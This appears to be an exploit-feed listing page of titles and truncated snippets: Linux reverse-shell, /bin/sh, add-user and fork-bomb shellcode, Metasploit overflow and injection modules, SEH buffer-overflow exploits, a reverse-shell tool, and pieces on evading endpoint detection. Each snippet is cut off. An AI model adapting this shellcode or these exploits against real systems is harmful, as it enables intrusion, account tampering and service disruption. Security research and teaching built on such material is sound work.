Shikata Ga Nai Encoder Still Going Strong

One of the most popular exploit frameworks in the world is Metasploit. Its vast library of pocket exploits, pluggable payload environment, and simplicity of execution makes it the de facto base platform. Metasploit is used by pentesters, security enthusiasts, script kiddies, and even malicious...

Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)

Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global start section .text start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...

Linux/x86 - execve /bin/sh Shellcode (25 bytes)

Exploit Title: Linux/x86 - execve /bin/sh ShellCode 25 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 CVE: N/A / global start section .text start: cdq ; xor edx mul edx lea ecx, eax mov esi, 0x68732f2f mov edi, 0x6e69622f push ecx ; push NULL in stack push...

Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)

Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode 74 bytes Author: bolonobolo Vendor Homepage: None Software Link: None Tested on: Linux x86 Comments: add user "User" to /etc/passwd CVE: N/A / 00000000 31DB xor ebx,ebx 00000002 31C9 xor ecx,ecx 00000004 66B90104 mov cx,0x401...

Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)

Exploit Title: Linux/x86 - Add User to /etc/passwd Shellcode 59 bytes Exploit Author: sagar.offsec VL43CK Guided by: Touhid M.Shaikh Designation: Security Consultant at SecureLayer7 Website: https://www.sagaroffsec.com Tested on: Ubuntu i386 GNU/LINUX Shellcode Length: 59...

ASX to MP3 converter 3.1.3.7 - (.asx) Local Stack Overflow (DEP Bypass) Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow DEP", 'Description' = %q This module exploits a stack buffer overfl...

ASX To MP3 Converter 3.1.3.7 Stack Overflow

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow DEP", 'Description' = %q This module exploits a stack buffer overfl...

ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass) (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow DEP", 'Description' = %q This module exploits a stack buffer overfl...

Staying Hidden on the Endpoint: Evading Detection with Shellcode

True red team assessments require a secondary objective of avoiding detection. Part of the glory of a successful red team assessment is not getting detected by anything or anyone on the system. As modern Endpoint Detection and Response EDR products have matured over the years, the red teams must...

Exploit for Incorrect Default Permissions in Kramerav Viaware

Exploit Title: KRAMER VIAware 2.5.0719.1034 - Remote Code Exec...

Linux/ARM - Fork Bomb Shellcode (20 bytes)

Title: Linux/ARM - Fork Bomb Shellcode 20 bytes Category: Shellcode Tested: armv7l 32-bitRaspberry Pi 2 Model B OS: Raspbian Buster Lite Author: CJHackerz Description: This shellcode creates new processes in infinite loop to exhaust CPU resources leading to crash / Compilation instruction...

Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)

Date: 4th October 2019 Shellcode Author: @bolonobolo - https://bolonobolo.github.io Tested on: Linux x86 execve.asm global start section .text start: ; put NULL bytes in the stack xor eax, eax push eax //bin/sh push 0x68732f6e push 0x69622f2f mov ebx, esp ; push NULL in the EDX position push eax...

freeFTP 1.0.8 - PASS Remote Buffer Overflow

freeFTP 1.0.8 - PASS Remote Buffer Overflow Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow Date: 2019-09-01 Author: Chet Manly Software Link: https://download.cnet.com/FreeFTP/3000-21604-10047242.html Version: 1.0.8 CVE: N/A from ftplib import FTP buf = "" buf +=...

File Sharing Wizard 1.5.0 DELETE SEH Buffer Overflow

import socket from struct import Exploit Title: File sharing wizard 'DELETE' remote SEH overflow Date: 10/4/2019 Exploit Author: Striker Vendor Homepage: https://file-sharing-wizard.soft112.com/ Version: 1.5.0 Build on 26-8-2008 Tested on: Windows 7 File-sharing-wizard-seh host = "10.0.2.7" port ...

DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH) Exploit

!/usr/bin/env python Author: Xavi Beltran Contact: email protected Exploit Development: https://xavibel.com/2019/08/31/seh-based-local-buffer-overflow-dameware-remote-support-v-12-1-0-34/ Date: 14/7/2019 Description: SEH based Buffer Overflow DameWare Remote Support V. 12.1.0.34 Tools Computer...

ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shellcode Into A Standard Win32 Application

Program uses Thread Hijacking to Inject Native Shellcode into a Standard Win32 Application. With Thread Hijacking, it allows the hijacker.exe program to suspend a thread within the target.exe program allowing us to write shellcode to a thread. Usage int main System sys; Interceptor incp; Exceptio...

Windows Manage Memory Shellcode Injection Module

This module will inject into the memory of a process a specified shellcode. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Manage Memory Shellcode Injection Module', 'Description' = %q...

DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)

DameWare Remote Support 12.1.0.34 - Buffer Overflow SEH !/usr/bin/env python Author: Xavi Beltran Contact: [email protected] Exploit Development: https://xavibel.com/2019/08/31/seh-based-local-buffer-overflow-dameware-remote-support-v-12-1-0-34/ Date: 14/7/2019 Description: SEH based...

Exploit for Use After Free in Microsoft

Run msfconsole meterpreter/multi/handler to listen on 192.1...

HRShell - An Advanced HTTPS/HTTP Reverse Shell Built With Flask

HRShell: An advanced HTTPSReverse Shell built with Flask HRShell is an HTTPS/HTTP reverse shell built with flask. It's compatible with python 3.x and has been successfully tested on: Linux ubuntu 18.04 LTS, Kali Linux 2019.3 macOS Mojave Windows 7/10 Features It's stealthy TLS support Either usin...